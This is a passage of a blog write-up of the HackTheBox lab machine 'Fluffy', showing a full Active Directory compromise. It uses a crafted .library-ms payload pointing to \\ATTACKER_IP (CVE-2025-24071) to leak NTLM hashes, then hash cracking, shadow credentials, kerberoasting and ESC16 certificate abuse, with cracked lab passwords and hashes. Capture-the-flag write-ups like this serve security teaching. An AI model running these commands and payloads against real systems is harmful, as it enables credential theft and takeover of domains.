</span></span></code></pre></div><figure><img src=/img/fluffy/Pasted%20image%2020260526154536.webp></figure><p>This will more clearly show the permissions the user have on each shares. I downloaded the <code>Upgrade_notice.pdf</code> file.</p><figure><img src=/img/fluffy/Pasted%20image%2020260526155053.webp></figure><figure><img src=/img/fluffy/Pasted%20image%2020260526155219.webp></figure><p>There are a few CVEs mentioned in the PDF, out of which 2 of them are marked as critical severity.</p><hr><h2 id=exploiting-cve-2025-24071><a href=#exploiting-cve-2025-24071 class=anchor-head aria-label=Anchor></a>Exploiting CVE-2025-24071</h2><p>After reviewing the list, <code>CVE-2025-24071</code> stood out. There was a public <a href=https://github.com/0x6rss/CVE-2025-24071_PoC>poc</a> available. The poc and <a href=https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/>other</a> <a href=https://cti.monster/blog/2025/03/18/CVE-2025-24071.html>sources</a> pointed out involving RAR/ZIP files in order to leak NTLM hashes.</p><blockquote><p><strong>CVE-2025-24054</strong> is a vulnerability related to <strong>NTLM hash disclosure via spoofing</strong>, which can be exploited using a maliciously crafted <code>.library-ms</code> file.</p></blockquote><blockquote><p>When a specially crafted <strong>.library-ms</strong> file containing an SMB path is compressed within a RAR/ZIP archive and subsequently extracted, Windows Explorer automatically parses the contents of this file due to its built-in indexing and preview mechanism. This behavior occurs because Windows Explorer processes certain file types automatically upon extraction to generate previews, thumbnails, or index metadata, even if the file is never explicitly opened or clicked by the user.</p></blockquote><p>We saw zip files listed in the <code>IT</code> share and we also have write access in that share. To exploit this we need craft a malicious <code>.library-ms</code> file, add our smb server location inside it, create a zip file, and put it in the <code>IT</code> share. If any of the users tries to extract the zip file, it will try to authenticate with out smb server and we will get access to their NTLM hash.</p><h3 id=crafting-the-payload><a href=#crafting-the-payload class=anchor-head aria-label=Anchor></a>Crafting the payload</h3><p>This is an example <code>.library-ms</code> file that we can use to trigger the exploit.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-xml data-lang=xml><span style=display:flex><span><span style=color:#8ec07c>&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;</span>
</span></span><span style=display:flex><span><span style=color:#fb4934>&lt;libraryDescription</span> <span style=color:#b8bb26;font-weight:700>xmlns=</span><span style=color:#b8bb26>&#34;http://schemas.microsoft.com/windows/2009/library&#34;</span><span style=color:#fb4934>&gt;</span>
</span></span><span style=display:flex><span>  <span style=color:#fb4934>&lt;searchConnectorDescriptionList&gt;</span>
</span></span><span style=display:flex><span>    <span style=color:#fb4934>&lt;searchConnectorDescription&gt;</span>
</span></span><span style=display:flex><span>      <span style=color:#fb4934>&lt;simpleLocation&gt;</span>
</span></span><span style=display:flex><span>        <span style=color:#fb4934>&lt;url&gt;</span>\\ATTACKER_IP\shared<span style=color:#fb4934>&lt;/url&gt;</span>
</span></span><span style=display:flex><span>      <span style=color:#fb4934>&lt;/simpleLocation&gt;</span>
</span></span><span style=display:flex><span>    <span style=color:#fb4934>&lt;/searchConnectorDescription&gt;</span>
</span></span><span style=display:flex><span>  <span style=color:#fb4934>&lt;/searchConnectorDescriptionList&gt;</span>
</span></span><span style=display:flex><span><span style=color:#fb4934>&lt;/libraryDescription&gt;</span>
</span></span></code></pre></div><p>Create the zip file:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>zip poc.zip poc.library-ms
</span></span></code></pre></div><h3 id=collecting-ntlmv2-hash-of-pagila><a href=#collecting-ntlmv2-hash-of-pagila class=anchor-head aria-label=Anchor></a>Collecting NTLMv2 hash of <code>p.agila</code></h3><p>Start an SMB server using <code>responder</code>:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>sudo responder -I tun0
</span></span></code></pre></div><p>Upload the zip file to the <code>IT</code> share and after a few minutes someone will extract it and we can collect the NTLM hash:</p><figure><img src=/img/fluffy/Pasted%20image%2020260526165513.webp></figure><h3 id=hash-cracking><a href=#hash-cracking class=anchor-head aria-label=Anchor></a>Hash Cracking</h3><p>Let&rsquo;s try to crack this using <code>hashcat</code>:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>hashcat -m <span style=color:#d3869b>5600</span> hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>hashcat <span style=color:#fe8019>(</span>v7.1.2<span style=color:#fe8019>)</span> starting
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>[</span>...<span style=color:#fe8019>]</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Dictionary cache building /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt: <span style=color:#d3869b>33553435</span>
</span></span><span style=display:flex><span>Dictionary cache built:
</span></span><span style=display:flex><span>* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
</span></span><span style=display:flex><span>* Passwords.: <span style=color:#d3869b>14344391</span>
</span></span><span style=display:flex><span>* Bytes.....: <span style=color:#d3869b>139921497</span>
</span></span><span style=display:flex><span>* Keyspace..: <span style=color:#d3869b>14344384</span>
</span></span><span style=display:flex><span>* Runtime...: <span style=color:#d3869b>0</span> secs
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>P.AGILA::FLUFFY:441627b66f8d87bb:e0d2b0884d16574c45383344b2b4875f:0101000000000000803bf4c82eeddc01315d4e64be718b0700000000020008005a004e0039004c0001001e00570049004e002d003800480043004600410052003000410039003200390004003400570049004e002d00380048004300460041005200300041003900320039002e005a004e0039004c002e004c004f00430041004c00030014005a004e0039004c002e004c004f00430041004c00050014005a004e0039004c002e004c004f00430041004c0007000800803bf4c82eeddc01060004000200000008003000300000000000000001000000002000009bdc9245f1cbfbd6f64641024585c7db740a017780c085bb72f51db09570ac770a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00330030000000000000000000:prometheusx-303
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Session..........: hashcat
</span></span><span style=display:flex><span>Status...........: Cracked
</span></span><span style=display:flex><span>Hash.Mode........: <span style=color:#d3869b>5600</span> <span style=color:#fe8019>(</span>NetNTLMv2<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>Hash.Target......: P.AGILA::FLUFFY:441627b66f8d87bb:e0d2b0884d16574c45...000000
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>[</span>...<span style=color:#fe8019>]</span>
</span></span></code></pre></div><figure><img src=/img/fluffy/Pasted%20image%2020260526170227.webp></figure><h3 id=verification><a href=#verification class=anchor-head aria-label=Anchor></a>Verification</h3><p>The credentials is working fine.</p><figure><img src=/img/fluffy/Pasted%20image%2020260526171437.webp></figure><p>We still don&rsquo;t have winrm access:</p><figure><img src=/img/fluffy/Pasted%20image%2020260526173353.webp></figure><hr><h2 id=lateral-movement-to-user><a href=#lateral-movement-to-user class=anchor-head aria-label=Anchor></a>Lateral Movement to user</h2><h3 id=enumeration-1><a href=#enumeration-1 class=anchor-head aria-label=Anchor></a>Enumeration</h3><p>From bloodhound we get to know that user <code>p.agila</code> is a member of <code>Service Account Managers</code> which have <code>GenericAll</code> permission on <code>Service Accounts</code> which then have <code>GenericWrite</code> on user <code>winrm_svc</code>.</p><figure><img src=/img/fluffy/Pasted%20image%2020260526174721.webp></figure><p><code>winrm_svc</code> is a member of <code>Remote Management Users</code>, which means they have winrm access.</p><figure><img src=/img/fluffy/Pasted%20image%2020260526175007.webp></figure><h3 id=adding-pagila-to-service-accounts><a href=#adding-pagila-to-service-accounts class=anchor-head aria-label=Anchor></a>Adding <code>p.agila</code> to <code>Service Accounts</code></h3><p>First we need to add user <code>p.agila</code> to the <code>Service Accounts</code> group. We can use <a href=https://github.com/CravateRouge/bloodyAD><code>bloodyAD</code></a> for this:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>bloodyad -d fluffy.htb --host dc01.fluffy.htb -u p.agila -p prometheusx-303 add groupMember <span style=color:#b8bb26>&#39;Service Accounts&#39;</span> p.agila
</span></span></code></pre></div><figure><img src=/img/fluffy/Pasted%20image%2020260526180720.webp></figure><h3 id=exploiting-genericwrite><a href=#exploiting-genericwrite class=anchor-head aria-label=Anchor></a>Exploiting <code>GenericWrite</code></h3><p>Now <code>p.agila</code> have <code>GenericWrite</code> on users <code>winrm_svc</code>, <code>ldap_svc</code>, and <code>ca_svc</code>.</p><figure><img src=/img/fluffy/Pasted%20image%2020260527095554.webp></figure><p>From these <code>winrm_svc</code> can be used to get winrm access. <code>ca_svc</code> user also looks interesting as it&rsquo;s part of the <a href=https://decoder.cloud/2023/11/20/a-deep-dive-in-cert-publishers-group/><code>Cert Publishers</code> group</a> which could potentially lead to an exploitable path. So we should also keep an eye on that user as well.</p><p>The <code>GenericWrite</code> ACE can be abused using techniques like shadow credentials or targeted kerberoasting. We&rsquo;ll explore both.</p><h4 id=targeted-kerberoasting-of-winrm_svc><a href=#targeted-kerberoasting-of-winrm_svc class=anchor-head aria-label=Anchor></a>Targeted Kerberoasting of <code>winrm_svc</code></h4><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>faketime -f <span style=color:#b8bb26>&#39;+7h&#39;</span> nxc ldap dc01.fluffy.htb -d fluffy.htb -u p.agila -p prometheusx-303 --kerberoasting kerberos.txt --kerberoast-account winrm_svc
</span></span></code></pre></div><figure><img src=/img/fluffy/Pasted%20image%2020260527104043.webp></figure><p>Let&rsquo;s try to crack this:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>john --format<span style=color:#fe8019>=</span>krb5tgs --wordlist<span style=color:#fe8019>=</span>/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt kerberos.txt
</span></span></code></pre></div><figure><img src=/img/fluffy/Pasted%20image%2020260527104944.webp></figure><p>But unfortunately the wordlist got exhausted and we couldn&rsquo;t find any valid passwords.</p><h4 id=shadow-credentials-attack><a href=#shadow-credentials-attack class=anchor-head aria-label=Anchor></a>Shadow Credentials Attack</h4><p>On PKINIT based authentication instead of using key derived from the password of the user, public-private key pairs are utilised. On client authentication request, the KDC verifies the request signed using the private key of the user using the public key present in the <code>msDS-KeyCredentialLink</code> attribute of that user. If valid public key is found, the KDC uses that to verify the signature and grants TGT. When an object have permissions like <code>GenericWrite</code> on other users, like in our case, we can inject our own public key to the <code>msDS-KeyCredentialLink</code> attribute leading to impersonation of the user. You can read more in depth about this attack from <a href=https://www.hackingarticles.in/shadow-credentials-attack/>here</a>.</p><p>In our case we can obtain NT hash of <code>winrm_svc</code> using this attack:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>faketime -f <span style=color:#b8bb26>&#39;+7h&#39;</span> certipy shadow auto -u p.agila@fluffy.htb -p prometheusx-303 -account winrm_svc
</span></span></code></pre></div><figure><img src=/img/fluffy/Pasted%20image%2020260527120836.webp></figure><p>Let&rsquo;s retrieve hash of <code>ca_svc</code> as well</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>faketime -f <span style=color:#b8bb26>&#39;+7h&#39;</span> certipy shadow auto -u p.agila@fluffy.htb -p prometheusx-303 -account ca_svc
</span></span></code></pre></div><figure><img src=/img/fluffy/Pasted%20image%2020260527121712.webp></figure><p>Save the hash for later.</p><h3 id=winrm-as-winrm_svc><a href=#winrm-as-winrm_svc class=anchor-head aria-label=Anchor></a>WinRM as <code>winrm_svc</code></h3><p>First let&rsquo;s try to use <code>evil-winrm</code> using the hash of <code>winrm_svc</code>:</p><figure><img src=/img/fluffy/Pasted%20image%2020260527121943.webp></figure><p>Now we can read the user.txt</p><figure><img src=/img/fluffy/Pasted%20image%2020260527125349.webp></figure><hr><h2 id=privilege-escalation><a href=#privilege-escalation class=anchor-head aria-label=Anchor></a>Privilege Escalation</h2><h3 id=adcs-enumeration><a href=#adcs-enumeration class=anchor-head aria-label=Anchor></a>ADCS Enumeration</h3><p>From bloodhound we can see that <code>ca_svc</code> is a member of <code>Cert Publishers</code> group and have enrollment rights to the CA <code>fluffy-dc01-ca</code>.</p><figure><img src=/img/fluffy/Pasted%20image%2020260527125600.webp></figure><p>We can check for vulnerable templates or vulnerabilities in this CA using <code>certipy</code></p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>certipy find -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -vulnerable -stdout
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>Certificate Authorities
</span></span><span style=display:flex><span>  <span style=color:#d3869b>0</span>
</span></span><span style=display:flex><span>    CA Name                             : fluffy-DC01-CA
</span></span><span style=display:flex><span>    DNS Name                            : DC01.fluffy.htb
</span></span><span style=display:flex><span>    Certificate Subject                 : CN<span style=color:#fe8019>=</span>fluffy-DC01-CA, DC<span style=color:#fe8019>=</span>fluffy, DC<span style=color:#fe8019>=</span>htb
</span></span><span style=display:flex><span>    Certificate Serial Number           : 3150FA7E60CE28AD4DAE41A1B61D8874
</span></span><span style=display:flex><span>    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
</span></span><span style=display:flex><span>    Certificate Validity End            : 3024-04-17 16:12:16+00:00
</span></span><span style=display:flex><span>    Web Enrollment
</span></span><span style=display:flex><span>      HTTP
</span></span><span style=display:flex><span>        Enabled                         : False
</span></span><span style=display:flex><span>      HTTPS
</span></span><span style=display:flex><span>        Enabled                         : False
</span></span><span style=display:flex><span>    User Specified SAN                  : Disabled
</span></span><span style=display:flex><span>    Request Disposition                 : Issue
</span></span><span style=display:flex><span>    Enforce Encryption <span style=color:#fe8019>for</span> Requests     : Enabled
</span></span><span style=display:flex><span>    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
</span></span><span style=display:flex><span>    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
</span></span><span style=display:flex><span>    Permissions
</span></span><span style=display:flex><span>      Owner                             : FLUFFY.HTB<span style=color:#b8bb26>\A</span>dministrators
</span></span><span style=display:flex><span>      Access Rights
</span></span><span style=display:flex><span>        ManageCa                        : FLUFFY.HTB<span style=color:#b8bb26>\D</span>omain Admins
</span></span><span style=display:flex><span>                                          FLUFFY.HTB<span style=color:#b8bb26>\E</span>nterprise Admins
</span></span><span style=display:flex><span>                                          FLUFFY.HTB<span style=color:#b8bb26>\A</span>dministrators
</span></span><span style=display:flex><span>        ManageCertificates              : FLUFFY.HTB<span style=color:#b8bb26>\D</span>omain Admins
</span></span><span style=display:flex><span>                                          FLUFFY.HTB<span style=color:#b8bb26>\E</span>nterprise Admins
</span></span><span style=display:flex><span>                                          FLUFFY.HTB<span style=color:#b8bb26>\A</span>dministrators
</span></span><span style=display:flex><span>        Enroll                          : FLUFFY.HTB<span style=color:#b8bb26>\C</span>ert Publishers
</span></span><span style=display:flex><span>                                          FLUFFY.HTB<span style=color:#b8bb26>\A</span>dministrators
</span></span><span style=display:flex><span>        Read                            : FLUFFY.HTB<span style=color:#b8bb26>\A</span>dministrators
</span></span><span style=display:flex><span>    <span style=color:#fe8019>[</span>!<span style=color:#fe8019>]</span> Vulnerabilities
</span></span><span style=display:flex><span>      ESC16                             : Security Extension is disabled.
</span></span><span style=display:flex><span>    <span style=color:#fe8019>[</span>*<span style=color:#fe8019>]</span> Remarks
</span></span><span style=display:flex><span>      ESC16                             : Other prerequisites may be required <span style=color:#fe8019>for</span> this to be exploitable. See the wiki <span style=color:#fe8019>for</span> more details.
</span></span><span style=display:flex><span>Certificate Templates                   : <span style=color:#fe8019>[</span>!<span style=color:#fe8019>]</span> Could not find any certificate templates
</span></span></code></pre></div><figure><img src=/img/fluffy/Pasted%20image%2020260527130352.webp></figure><p>The CA is vulnerable to <a href>ESC16</a></p><h2 id=privilege-escalation---esc16><a href=#privilege-escalation---esc16 class=anchor-head aria-label=Anchor></a>Privilege Escalation - ESC16</h2><p>As mentioned in the certipy wiki, a CA is vulnerable to ESC16 if <code>szOID_NTDS_CA_SECURITY_EXT</code> extension identified by <code>1.3.6.1.4.1.311.25.2</code> is disabled for it. When this security extension is disabled and if the DC is not operating in full enforcement (the value of registry key <code>StrongCertificateBindingEnforcement = 1</code> or <code>0</code>) they will fall back on weaker certificate mapping methods based on UPN or DNS. So if we can update the UPN of the user with the <code>sAMAccountName</code> of a target user, we can impersonate them.</p><p>All the user&rsquo;s in the <code>Service Accounts</code> group have <code>GenericWrite</code> on each other:</p><figure><img src=/img/fluffy/Pasted%20image%2020260527151925.webp></figure><p>We can use the credential of <code>winrm_svc</code> to update the UPN of <code>ca_svc</code> to <code>administrator</code>, request a certificate and get the hash for <code>administrator</code>.</p><h3 id=update-the-upn><a href=#update-the-upn class=anchor-head aria-label=Anchor></a>Update the UPN</h3><p>Right now the UPN of <code>ca_svc</code> shows:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>certipy account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -user ca_svc <span style=color:#fabd2f>read</span>
</span></span></code></pre></div><figure><img src=/img/fluffy/Pasted%20image%2020260527152524.webp></figure><p>We have to update this to <code>administrator</code>:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>certipy account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -user ca_svc update -upn administrator
</span></span></code></pre></div><figure><img src=/img/fluffy/Pasted%20image%2020260527152646.webp></figure><h3 id=request-certificate><a href=#request-certificate class=anchor-head aria-label=Anchor></a>Request certificate</h3><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>certipy req -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip $IP -target dc01.fluffy.htb -ca fluffy-DC01-CA -template User
</span></span></code></pre></div><figure><img src=/img/fluffy/Pasted%20image%2020260527155214.webp></figure><p>Now revert the UPN to the original one:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>certipy account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -user ca_svc update -upn ca_svc@fluffy.htb
</span></span></code></pre></div><figure><img src=/img/fluffy/Pasted%20image%2020260527155745.webp></figure><h3 id=get-hash-of-administrator><a href=#get-hash-of-administrator class=anchor-head aria-label=Anchor></a>Get hash of Administrator</h3><p>Now we have to use the certificate to send an auth request and retrieve the hash of <code>administrator</code></p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>faketime -f <span style=color:#b8bb26>&#39;+7h&#39;</span> certipy auth -pfx administrator.pfx -username Administrator -domain fluffy.htb -dc-ip $IP
</span></span></code></pre></div><figure><img src=/img/fluffy/Pasted%20image%2020260527155602.webp></figure><p>Got it! Let&rsquo;s try to get shell access using the hash:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>evil-wirm -i dc01.fluffy.htb -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e
</span></span></code></pre></div><figure><img src=/img/fluffy/Pasted%20image%2020260527165000.webp></figure><p>And Here&rsquo;s the flag:</p><figure><img src=/img/fluffy/Pasted%20image%2020260527165051.webp></figure><hr><h3 id=references><a href=#references class=anchor-head aria-label=Anchor></a>References</h3><ul><li><a href=https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/>https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/</a></li><li><a href=https://cti.monster/blog/2025/03/18/CVE-2025-24071.html>https://cti.monster/blog/2025/03/18/CVE-2025-24071.html</a></li><li><a href=https://github.com/0x6rss/CVE-2025-24071_PoC>https://github.com/0x6rss/CVE-2025-24071_PoC</a></li><li><a href=https://decoder.cloud/2023/11/20/a-deep-dive-in-cert-publishers-group/>https://decoder.cloud/2023/11/20/a-deep-dive-in-cert-publishers-group/</a></li><li><a href=https://www.hackingarticles.in/shadow-credentials-attack/>https://www.hackingarticles.in/shadow-credentials-attack/</a></li><li><a href=https://www.hackingarticles.in/adcs-esc16-security-extension-disabled-on-ca-globally/>https://www.hackingarticles.in/adcs-esc16-security-extension-disabled-on-ca-globally/</a></li></ul></div></article></main><aside id=sticky-top><div class=toc-title><p>Fluffy | HackTheBox</p><hr id=toc-hr></div><nav id=toc class=toc-container><nav id=TableOfContents><ul><li><ul><li><a href=#overview>Overview</a></li></ul></li><li><a href=#information-gathering>Information Gathering</a></li><li><a href=#enumeration>Enumeration</a><ul><li><a href=#initial-credentials>Initial Credentials</a></li><li><a href=#smb---port-445>SMB - Port 445</a></li></ul></li><li><a href=#exploiting-cve-2025-24071>Exploiting CVE-2025-24071</a><ul><li><a href=#crafting-the-payload>Crafting the payload</a></li><li><a href=#collecting-ntlmv2-hash-of-pagila>Collecting NTLMv2 hash of <code>p.agila</code></a></li><li><a href=#hash-cracking>Hash Cracking</a></li><li><a href=#verification>Verification</a></li></ul></li><li><a href=#lateral-movement-to-user>Lateral Movement to user</a><ul><li><a href=#enumeration-1>Enumeration</a></li><li><a href=#adding-pagila-to-service-accounts>Adding <code>p.agila</code> to <code>Service Accounts</code></a></li><li><a href=#exploiting-genericwrite>Exploiting <code>GenericWrite</code></a></li><li><a href=#winrm-as-winrm_svc>WinRM as <code>winrm_svc</code></a></li></ul></li><li><a href=#privilege-escalation>Privilege Escalation</a><ul><li><a href=#adcs-enumeration>ADCS Enumeration</a></li></ul></li><li><a href=#privilege-escalation---esc16>Privilege Escalation - ESC16</a><ul><li><a href=#update-the-upn>Update the UPN</a></li><li><a href=#request-certificate>Request certificate</a></li><li><a href=#get-hash-of-administrator>Get hash of Administrator</a></li><li><a href=#references>References</a></li></ul></li></ul></nav></nav></aside><small class=post-updated-at>updated at 2026-05-27</small><hr><div class=series-nav><div class="alert alert-note"><div class=alert-heading-box><a href=https://h4r1337.github.io/series/hack-the-box/><p class=alert-heading>Hack the Box Series</p></a></div></div><nav class=post-nav style=margin-top:1rem;border-top:none><a class="post-nav-item post-nav-prev" href=https://h4r1337.github.io/posts/resource/><div class=nav-arrow>Previous in series</div><span class=post-title>Resource | HackTheBox</span>
</a><a class="post-nav-item post-nav-next" href=https://h4r1337.github.io/posts/jeeves/><div class=nav-arrow>Next in series</div><span class=post-title>Jeeves | HackTheBox</span></a></nav></div><nav class=post-nav><a class="post-nav-item post-nav-prev" href=https://h4r1337.github.io/posts/shellshock/><div class=nav-arrow>Previous</div><span class=post-title>CVE-2014-6271 - Shellshock</span>
</a><a class="post-nav-item post-nav-next" href=https://h4r1337.github.io/posts/jeeves/><div class=nav-arrow>Next</div><span class=post-title>Jeeves | HackTheBox</span></a></nav></div><footer class=footer><a class=footer_item href=javascript::void(0)>resume</a>
<a class=footer_item href=/index.xml>rss</a>
<span class=footer_item>&copy; 2026</span>
<small class=footer_copyright><a href=https://github.com/h4r1337/hugo-klise target=_blank rel="noreferrer noopener">hugo-klisé</a>
theme on
<a href=https://gohugo.io target=_blank rel="noreferrer noopener">Hugo</a><br><span>Made by <a href=https://github.com/h4r1337 target=_blank rel="noreferrer noopener">h4r1337</a></span></small></footer><script src=/js/main.js defer></script><script src=/js/toc.js defer></script></body></html>